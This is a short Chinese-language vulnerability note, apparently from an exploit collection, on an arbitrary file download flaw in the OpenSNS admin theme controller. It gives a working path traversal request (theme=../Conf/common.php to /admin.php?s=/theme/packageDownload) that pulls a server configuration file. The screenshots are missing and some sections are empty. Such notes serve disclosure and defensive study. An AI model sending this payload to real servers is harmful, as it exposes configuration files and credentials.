# OpenSNS ThemeController.class.php 后台任意文件下载漏洞

# 漏洞描述

OpenSNS ThemeController.class.php文件中存在文件下载,其中过滤不足导致可以下载服务器任意文件

# 漏洞影响


# 网络测绘


# 漏洞复现

登录页面如下

img

存在漏洞的文件为 Application/Admin/Model/ThemeController.class.php

img

其中 theme参数为用户可控参数,根据函数流程可以发现存在的文件将会打包为 zip文件提供下载

img

构造请求

POST /admin.php?s=/theme/packageDownload

theme=../Conf/common.php
1
2
3

img